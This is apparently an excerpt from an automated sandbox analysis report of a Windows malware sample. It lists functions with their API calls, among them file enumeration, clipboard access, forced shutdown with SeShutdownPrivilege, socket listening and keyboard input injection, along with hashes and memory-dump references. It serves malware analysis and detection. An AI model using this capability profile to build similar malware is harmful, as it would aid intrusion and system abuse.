                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFind_wcscat$AttributesCloseFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                  • API String ID: 1343497842-1173974218
                                                                                                                                                                  • Opcode ID: e2a01c6ddc1f1d6f030c7fa942012444e13068f51b7faa219dbfec0174e45a69
                                                                                                                                                                  • Instruction ID: daaff09244f374fec47dda79c44d88b41aa1ae3484f36dda97e938a09cca7a06
                                                                                                                                                                  • Opcode Fuzzy Hash: e2a01c6ddc1f1d6f030c7fa942012444e13068f51b7faa219dbfec0174e45a69
                                                                                                                                                                  • Instruction Fuzzy Hash: 9121D172418349BAC710EFE0E8889DBBBDC9F59310F044A5AF4D4C3042EA30D62C8BA2
                                                                                                                                                                  Function 00237294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                                                  • Opcode ID: 7ba08963be01d1b6d08dddd7c5c0a87a0e431f804b8d194999f9684ef65c01f7
                                                                                                                                                                  • Instruction ID: f34314cf3f4f0d7a21830994d729612803f969a89a53033aabbc50ca57503f09
                                                                                                                                                                  • Opcode Fuzzy Hash: 7ba08963be01d1b6d08dddd7c5c0a87a0e431f804b8d194999f9684ef65c01f7
                                                                                                                                                                  • Instruction Fuzzy Hash: C121A171714219AFDB10AF64FC59B6E7BA8EF54720F048019F90ADB2A1DBB4ED508B90
                                                                                                                                                                  Function 002324A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002324F6
                                                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00232526
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0023253A
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00232555
                                                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002325F3
                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00232609
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 713712311-438819550
                                                                                                                                                                  • Opcode ID: 8754df245a86e66573ddcb5976f984de0a70b247df5feea4066145ed058712b1
                                                                                                                                                                  • Instruction ID: 7c899a6fd3b719b880db5e60c5b39d922fb42d1260f26b2ed8460c0647172cd1
                                                                                                                                                                  • Opcode Fuzzy Hash: 8754df245a86e66573ddcb5976f984de0a70b247df5feea4066145ed058712b1
                                                                                                                                                                  • Instruction Fuzzy Hash: 35417BB191420AEFCF14DFA4CC59AEEBBB8BF19314F104456E815A2191E7709BA8CF90
                                                                                                                                                                  Function 001E8CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                                                  • API String ID: 0-1546025612
                                                                                                                                                                  • Opcode ID: a3296786e39defcfa3771678b0094df149245f54335d6b1f14e5397fbd8fae04
                                                                                                                                                                  • Instruction ID: 06d792ff618d34a29deaf2da6dd776b5d2ea8a6fdc58830012ebe77bc1d0f0d3
                                                                                                                                                                  • Opcode Fuzzy Hash: a3296786e39defcfa3771678b0094df149245f54335d6b1f14e5397fbd8fae04
                                                                                                                                                                  • Instruction Fuzzy Hash: 67929071E0065ACBDF28DF59C8807BDB7B1BB54314F2541AAE85AAB280D7709DD1CF90
                                                                                                                                                                  Function 001E8530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  • Opcode ID: 8c1f4c2e1cc9090ff6dffcae8516e0817b44f7e690c43246594008771b60234e
                                                                                                                                                                  • Instruction ID: 8fb135e734bf26f14320c0c8159d155c7326f5ee2ad02f12bbf1e4961d879c75
                                                                                                                                                                  • Opcode Fuzzy Hash: 8c1f4c2e1cc9090ff6dffcae8516e0817b44f7e690c43246594008771b60234e
                                                                                                                                                                  • Instruction Fuzzy Hash: 92129F70A00A09DFDF14DFA5D981AAEB3F5FF48300F204569E80AE7291EB35AD65CB54
                                                                                                                                                                  Function 002282D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0021BF0F
                                                                                                                                                                    • Part of subcall function 0021BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0021BF3C
                                                                                                                                                                    • Part of subcall function 0021BEC3: GetLastError.KERNEL32 ref: 0021BF49
                                                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 0022830C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                                                                  • Opcode ID: ab0b2e5711e76ffb28d395861730b00bffa78670daf1f1157400c70a4e80d7be
                                                                                                                                                                  • Instruction ID: c5b0883388a57480ad78f8f8b1322570a9941e6f236c34ee27a5992996316479
                                                                                                                                                                  • Opcode Fuzzy Hash: ab0b2e5711e76ffb28d395861730b00bffa78670daf1f1157400c70a4e80d7be
                                                                                                                                                                  • Instruction Fuzzy Hash: D601AC72B72336BBF7689AF8AC4ABB772589B14F80F144464F943D50D1DE90DC2181A4
                                                                                                                                                                  Function 002391DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00239235
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00239244
                                                                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 00239260
                                                                                                                                                                  • listen.WS2_32(00000000,00000005), ref: 0023926F
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00239289
                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 0023929D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279440585-0
                                                                                                                                                                  • Opcode ID: 42f7c3df1e52e14d4755ee0fa040d864f70df56507834a34bbe0a05bfb6dbd8e
                                                                                                                                                                  • Instruction ID: 3e7ff8891be6dd933f3031c19ff5d381a7ea09dd22d12c7cc082c77a5a1166aa
                                                                                                                                                                  • Opcode Fuzzy Hash: 42f7c3df1e52e14d4755ee0fa040d864f70df56507834a34bbe0a05bfb6dbd8e
                                                                                                                                                                  • Instruction Fuzzy Hash: B321F171610A04AFCB01EF64DC89B6EB7A8EF49320F108119FD56AB3D1CBB0AD41CB91
                                                                                                                                                                  Function 001E6670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID: hN)$tM)
                                                                                                                                                                  • API String ID: 4104443479-2809899604
                                                                                                                                                                  • Opcode ID: 42217aed2ca95e3252cc227c2f34e708f0d95b0ac634c5b8f6c287f00967c284
                                                                                                                                                                  • Instruction ID: 559789ef7f9cff7ddae73c68205af929a907997e77e2afcf6d2b5ee7a475c916
                                                                                                                                                                  • Opcode Fuzzy Hash: 42217aed2ca95e3252cc227c2f34e708f0d95b0ac634c5b8f6c287f00967c284
                                                                                                                                                                  • Instruction Fuzzy Hash: 8BA2BD70E0065ACFDB28CF59C8806ADBBB1FF58354F6581AAE819AB390D7709D81DF40
                                                                                                                                                                  Function 001EA0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0020010A: std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                    • Part of subcall function 0020010A: __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                  • _memmove.LIBCMT ref: 00253020
                                                                                                                                                                  • _memmove.LIBCMT ref: 00253135
                                                                                                                                                                  • _memmove.LIBCMT ref: 002531DC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1300846289-0
                                                                                                                                                                  • Opcode ID: a71adfa8038f55133ce65f3d10992702998b9d27eea425b6b2865f7ca14afadb
                                                                                                                                                                  • Instruction ID: a7ed3d08f6aa1377cd0911b045d7e9370d244387dcc0b5fb0f6554b77183a943
                                                                                                                                                                  • Opcode Fuzzy Hash: a71adfa8038f55133ce65f3d10992702998b9d27eea425b6b2865f7ca14afadb
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C02D470A00209DFDF04DF65D881ABEB7F5EF48340F558069E80AEB295EB31DA25CB95
                                                                                                                                                                  Function 002396E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0023ACD3: inet_addr.WS2_32(00000000), ref: 0023ACF5
                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0023973D
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000000), ref: 00239760
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4170576061-0
                                                                                                                                                                  • Opcode ID: 47cf2d7cec52d36f88f73e1403f847efff6a62f7c6a6c06b401976358bc6dbc9
                                                                                                                                                                  • Instruction ID: d7f17dc63c42675dc8d53fbb7c23d913d177d0317b30e452dac4ea8bd18bb2a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 47cf2d7cec52d36f88f73e1403f847efff6a62f7c6a6c06b401976358bc6dbc9
                                                                                                                                                                  • Instruction Fuzzy Hash: 12411571A10208AFDB10AF64CC86E7EB7ECEF44724F148058F956AB3D2DBB49D018B91
                                                                                                                                                                  Function 0022F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0022F37A
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022F3AA
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022F3BF
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0022F3D0
                                                                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0022F3FE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2387731787-0
                                                                                                                                                                  • Opcode ID: 48a9e245b2821136cc1604793b1af8352fb686c669f327801089bfc740d5f529
                                                                                                                                                                  • Instruction ID: 59157791497c5926fcc8b8adc4ac4a1e3cb77b2f383923a8a5a910a36bf7b913
                                                                                                                                                                  • Opcode Fuzzy Hash: 48a9e245b2821136cc1604793b1af8352fb686c669f327801089bfc740d5f529
                                                                                                                                                                  • Instruction Fuzzy Hash: A941AF356107029FC708DF68D490A9AB3F4FF49324F10416DEA5ACB3A1DBB1A955CF91
                                                                                                                                                                  Function 00224342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0022439C
                                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 002243B8
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00224425
                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00224483
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                  • Opcode ID: c405d31293e3eac698f6838475c4cb727d313e88e317cbc5f1fb05866cabf340
                                                                                                                                                                  • Instruction ID: 5205aa019b443b9ccbdb737a2fa0660b5c1e654e6442de0bc888ef2c5d1a403f
                                                                                                                                                                  • Opcode Fuzzy Hash: c405d31293e3eac698f6838475c4cb727d313e88e317cbc5f1fb05866cabf340
                                                                                                                                                                  • Instruction Fuzzy Hash: EA412970E20269BAEF20FFE4B8087FDBBB5AB44311F04015AF581561C1C7B489A4DB65
                                                                                                                                                                  Function 0024EFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0024EFE2
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0025F3C3,?,?,?,?,?), ref: 0024EFF7
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0024F041
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0025F3C3,?,?,?), ref: 0024F077
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
